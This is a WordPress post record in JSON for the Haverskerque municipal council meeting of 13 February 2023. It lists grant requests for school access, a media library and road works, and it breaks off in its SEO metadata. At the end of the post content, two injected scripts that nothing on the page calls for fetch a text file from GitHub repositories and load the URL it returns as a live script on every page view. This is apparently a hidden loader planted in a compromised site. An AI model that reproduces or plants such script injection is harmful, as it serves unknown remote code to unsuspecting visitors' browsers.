{"id":565,"date":"2023-02-14T12:56:13","date_gmt":"2023-02-14T11:56:13","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=565"},"modified":"2024-07-29T06:38:24","modified_gmt":"2024-07-29T04:38:24","slug":"conseil-municipal-du-13-fevrier-2023","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/","title":{"rendered":"Conseil municipal du 13 f\u00e9vrier 2023"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Approbation du proc\u00e8s-verbal du conseil municipal du 9 d\u00e9cembre 2022.<\/li>\n\n\n\n<li>Informations au Conseil Municipal.<\/li>\n<\/ul>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>1. DSIL &#8211; Sollicitation de la Dotation de soutien \u00e0 l\u2019investissement local (DSIL) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de l\u2019am\u00e9nagement et de la s\u00e9curisation de l\u2019acc\u00e8s aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/p>\n\n\n\n<p>2. DRAC &#8211; Sollicitation de la dotation g\u00e9n\u00e9rale de d\u00e9centralisation (DGD) 2023 pour les biblioth\u00e8ques au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/p>\n\n\n\n<p>3. R\u00e9gion Hauts-de-France &#8211; Sollicitation de l\u2019aide aux Communes et aux Territoires (ACTes) 2023 au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/p>\n\n\n\n<p>4. D\u00e9partement du Nord &#8211; Sollicitation de l\u2019Aide \u00e0 la S\u00e9curisation des Routes D\u00e9partementales en Agglom\u00e9ration (ASRDA) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/p>\n\n\n\n<p>5. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/p>\n\n\n\n<p>6. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement du projet de lutte contre le gaspillage alimentaire.<\/p>\n\n\n\n<p>7. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/p>\n\n\n\n<p>8.. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement d\u2019am\u00e9nagement du chemin pi\u00e9tonnier en sortie d\u2019agglom\u00e9ration le long de la D916 &#8211; Travaux suppl\u00e9mentaires en bordures des habitations.<\/p>\n\n\n\n<p>9. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mobilier de bureau.<\/p>\n\n\n\n<p>10. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mat\u00e9riels techniques.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_1872\"  _slug=\"convocation-13-fevrier-2023\" data-title=\"convocation-13-fevrier-2023\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >convocation 13 f\u00e9vrier 2023<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1872 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_13022023.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1914\"  _slug=\"proces-verbal-de-la-seance-du-13-fevrier-2023\" data-title=\"proces-verbal-de-la-seance-du-13-fevrier-2023\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal de la s\u00e9ance du 13 F\u00e9vrier 2023<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1914 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/pv_du_conseil_municipal_du_13_02_2023-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1911\"  _slug=\"sollicitation-de-la-dsil-pour-lamenagement-et-de-la-securisation-de-lacces-aux-services-periscolaires-et-a-lecole-saint-exupery\" data-title=\"sollicitation-de-la-dsil-pour-lamenagement-et-de-la-securisation-de-lacces-aux-services-periscolaires-et-a-lecole-saint-exupery\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Sollicitation de la DSIL pour l\u2019am\u00e9nagement et de la s\u00e9curisation de l\u2019acc\u00e8s aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1911 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/001_2023_dsil_securisation_ecole_perisco.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1908\"  _slug=\"drac-sollicitation-de-la-dgd-2023-pour-lextension-et-la-creation-dun-tiers-lieu-en-mediatheque-medilys\" data-title=\"drac-sollicitation-de-la-dgd-2023-pour-lextension-et-la-creation-dun-tiers-lieu-en-mediatheque-medilys\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >DRAC &#8211; Sollicitation de la DGD 2023 pour l\u2019extension et la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1908 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/002_2023_drac_mediatheque.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1905\"  _slug=\"region-hdf-sollicitation-de-lactes-2023-pour-lextension-et-la-creation-dun-tiers-lieu-en-mediatheque-medilys\" data-title=\"region-hdf-sollicitation-de-lactes-2023-pour-lextension-et-la-creation-dun-tiers-lieu-en-mediatheque-medilys\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >R\u00e9gion HDF &#8211; Sollicitation de l\u2019ACTes 2023 pour l\u2019extension et la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1905 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/003_2023_region_hdf_actes_mediatheque.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1902\"  _slug=\"departement-du-nord-sollicitation-de-lasrda-pour-la-securisation-de-lacces-pietonnier-aux-services-periscolaires-et-a-lecole-saint-exupery\" data-title=\"departement-du-nord-sollicitation-de-lasrda-pour-la-securisation-de-lacces-pietonnier-aux-services-periscolaires-et-a-lecole-saint-exupery\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9partement du Nord &#8211; Sollicitation de l\u2019ASRDA pour la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1902 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/004_2023_departement_du_nord_securisation_ecole_perisco.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1899\"  _slug=\"ccfl-sollicitation-du-fonds-de-concours-pour-la-securisation-de-lacces-pietonnier-aux-services-periscolaires-et-a-lecole-saint-exupery\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-pour-la-securisation-de-lacces-pietonnier-aux-services-periscolaires-et-a-lecole-saint-exupery\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL &#8211; Sollicitation du fonds de concours pour la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1899 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/005_2023_ccfl_fc_securisation_ecole_perisco.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1891\"  _slug=\"ccfl-sollicitation-du-fonds-de-concours-dans-le-cadre-du-projet-de-lutte-contre-le-gaspillage-alimentaire\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-dans-le-cadre-du-projet-de-lutte-contre-le-gaspillage-alimentaire\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL &#8211; Sollicitation du fonds de concours dans le cadre du projet de lutte contre le gaspillage alimentaire.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1891 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/006_2023_ccfl_fc_lutte_c_gaspillage_alim.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1888\"  _slug=\"sollicitation-du-fonds-de-concours-pour-lextension-et-de-la-creation-dun-tiers-lieu-en-mediatheque-medilys-ccfl\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-pour-lextension-et-de-la-creation-dun-tiers-lieu-en-mediatheque-medilys\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL-Sollicitation du fonds de concours pour l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1888 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/007_2023_ccfl_fc_mediatheque_tiers_lieu.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1885\"  _slug=\"sollicitation-du-fonds-de-concours-pour-les-travaux-damenagement-du-chemin-pietonnier-en-sortie-dagglomeration-le-long-de-la-d916\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-pour-les-travaux-damenagement-du-chemin-pietonnier-en-sortie-dagglomeration-le-long-de-la-d916\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL-Sollicitation du fonds de concours pour les travaux d\u2019am\u00e9nagement du chemin pi\u00e9tonnier en sortie d\u2019agglom\u00e9ration le long de la D916.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1885 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/008_2023_ccfl_fc_travaux_supp_d916.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1882\"  _slug=\"sollicitation-du-fonds-de-concours-au-titre-des-depenses-dinvestissement-de-mobilier-de-bureau\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-au-titre-des-depenses-dinvestissement-de-mobilier-de-bureau\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL-Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mobilier de bureau.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1882 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/009_2023_ccfl_fc_mobilier_et_informatique.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1879\"  _slug=\"sollicitation-du-fonds-de-concours-au-titre-des-depenses-dinvestissement-de-materiels-techniques\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-au-titre-des-depenses-dinvestissement-de-materiels-techniques\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL-Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mat\u00e9riels techniques.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1879 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/010_2023_ccfl_materiel_st.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_1875\"  _slug=\"sollicitation-du-fonds-de-concours-pour-lamenagement-de-lespace-albert-gravelaine\" data-title=\"ccfl-sollicitation-du-fonds-de-concours-pour-lamenagement-de-lespace-albert-gravelaine\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >CCFL-Sollicitation du fonds de concours pour l\u2019am\u00e9nagement de l\u2019espace Albert Gravelaine.<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_1875 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/011_2023_ccfl_fc_amenagement_albert_gravelaine.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR FINANCES 1. DSIL &#8211; Sollicitation de la Dotation de soutien \u00e0 l\u2019investissement local (DSIL) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de l\u2019am\u00e9nagement et de la s\u00e9curisation de l\u2019acc\u00e8s aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 2. DRAC &#8211; Sollicitation de la dotation g\u00e9n\u00e9rale de d\u00e9centralisation (DGD) 2023 pour les biblioth\u00e8ques au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 3. R\u00e9gion Hauts-de-France &#8211; Sollicitation de l\u2019aide aux Communes et aux Territoires (ACTes) 2023 au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 4. D\u00e9partement du Nord &#8211; Sollicitation de l\u2019Aide \u00e0 la S\u00e9curisation des Routes D\u00e9partementales en Agglom\u00e9ration (ASRDA) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 5. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 6. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement du projet de lutte contre le gaspillage alimentaire. 7. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 8.. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement d\u2019am\u00e9nagement du chemin pi\u00e9tonnier en sortie d\u2019agglom\u00e9ration le long de la D916 &#8211; Travaux suppl\u00e9mentaires en bordures des habitations. 9. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mobilier de bureau. 10. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mat\u00e9riels techniques.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-565","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR FINANCES 1. DSIL &#8211; Sollicitation de la Dotation de soutien \u00e0 l\u2019investissement local (DSIL) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de l\u2019am\u00e9nagement et de la s\u00e9curisation de l\u2019acc\u00e8s aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 2. DRAC &#8211; Sollicitation de la dotation g\u00e9n\u00e9rale de d\u00e9centralisation (DGD) 2023 pour les biblioth\u00e8ques au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 3. R\u00e9gion Hauts-de-France &#8211; Sollicitation de l\u2019aide aux Communes et aux Territoires (ACTes) 2023 au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 4. D\u00e9partement du Nord &#8211; Sollicitation de l\u2019Aide \u00e0 la S\u00e9curisation des Routes D\u00e9partementales en Agglom\u00e9ration (ASRDA) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 5. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 6. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement du projet de lutte contre le gaspillage alimentaire. 7. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 8.. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement d\u2019am\u00e9nagement du chemin pi\u00e9tonnier en sortie d\u2019agglom\u00e9ration le long de la D916 &#8211; Travaux suppl\u00e9mentaires en bordures des habitations. 9. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mobilier de bureau. 10. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mat\u00e9riels techniques.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-02-14T11:56:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil municipal du 13 f\u00e9vrier 2023\",\"datePublished\":\"2023-02-14T11:56:13+00:00\",\"dateModified\":\"2024-07-29T04:38:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/\"},\"wordCount\":369,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/\",\"name\":\"Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2023-02-14T11:56:13+00:00\",\"dateModified\":\"2024-07-29T04:38:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/02\\\/14\\\/conseil-municipal-du-13-fevrier-2023\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"